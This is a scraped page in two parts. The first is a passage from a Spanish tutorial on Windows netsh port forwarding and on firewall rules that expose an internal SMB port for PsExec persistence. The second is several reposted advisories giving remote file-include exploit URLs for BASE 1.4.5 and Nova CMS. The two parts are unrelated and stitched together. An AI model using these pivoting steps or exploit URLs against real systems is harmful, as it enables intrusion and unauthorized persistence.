  • listenaddress –> Especificamos la dirección de red en la que escuchará el puerto especificado en listenport. Esto indicará la interfaz en la que se escuchará.
  • connectport –> Especificamos el puerto de la dirección a la que queremos llegar
  • connectaddress –> Especificamos la dirección a la que queremos llegar

Como vemos en la imagen, en principio no aparece nada, ni error ni nada que diga que «ha ocurrido algo». Sin embargo, si ahora ejecutamos el comando anterior para ver la tabla de netsh:

image 10

Podemos ver como se ha establecido lo que le hemos dicho en los comandos de arriba. Nota: como se explica en el parámetro listenaddress, es importante indicar bien la dirección en la que escuchamos, si indicásemos por ejemplo 127.0.0.1 solo se podrá acceder desde el propio Windows. Sin embargo, indicándole 192.168.10.40 (que también es la IP del Windows), el puerto funcionará en la interfaz 192.168.10.0/24, y, por lo tanto, será accesible para los que tengan acceso a esta red. Aunque también podemos ahorrárnoslo, si no le especificamos el parámetro listenaddress, escuchará en todas las interfaces:

image 14

Con esto, Windows ya estaría realizando el Port Forwarding, por lo que vamos a comprobarlo desde nuestro kali:

image 11

Vemos que nos tuneliza perfectamente ambos puertos. Y realmente es tan sencillo como esto. Además, netsh guarda la configuración de los Port Forwarding en el siguiente registro:

HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp

image 15
image 16

Si quisiéramos eliminar/resetear la tabla de netsh (también se eliminan los registros), podríamos hacerlo con el siguiente comando:

netsh interface portproxy reset

image 12
image 13

Y de esta forma eliminaríamos cualquier tunelización que estemos haciendo, además de sus respectivos registros.

Control del Firewall con netsh

Otro aspecto muy útil que tiene netsh, es que nos permite controlar el firewall de Windows, añadiendo reglas que por ejemplo un puerto que solo esté accesible de forma interna, se muestre de hacia fuera. Es decir, si por ejemplo una máquina tuviese el SMB solo accesible de forma interna (esto significa que se esté ejecutando, pero solo de forma interna, si no estuviese ejecutándose no serviría de nada), y nosotros tuviésemos credenciales de administrador para usar con PsExec. Podríamos usar netsh para que el puerto SMB se muestre hacia fuera y así conseguir persistencia con PsExec.

En este aspecto, los comandos para arreglar reglas son los siguientes:

  • Tráfico entrante:

netsh advfirewall firewall add rule name=<nombre de la regla> protocol=TCP dir=in localport=<puerto> action=allow

image 17
  • Tráfico saliente:

netsh advfirewall firewall add rule name=<nombre de la regla> protocol=TCP dir=out localport=<puerto> action=allow

image 18

De esta forma el puerto ya estaría expuesto de forma externa. Hay muchas otras opciones en cuanto a firewall, pero a nivel práctico, si necesitásemos una para pivoting, sería esta, la capacidad de mostrar puertos internos de forma externa.

Netsh como se ha visto, es una herramienta muy cómoda para pivoting gracias a que viene por defecto en Windows. El único requerimiento como ya se ha dicho, es tener privilegios de Administrador.

HireHackking 
source: https://www.securityfocus.com/bid/51979/info
      
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
      
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
      
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include_once    File: base_logout.php            Line: 1
Exploit: http://www.example.com/base/base_logout.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
    
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
    
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
    
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include    File: base_graph_main.php            Line: 1
Exploit: http://www.example.com/base/base_graph_main.php?BASE_path=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51976/info

Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 

http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L]
HireHackking 
source: https://www.securityfocus.com/bid/51979/info
       
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
       
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
       
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include    File: base_main.php            Line: 15
Exploit: http://www.example.com/base/base_main.php?BASE_path=[EV!L]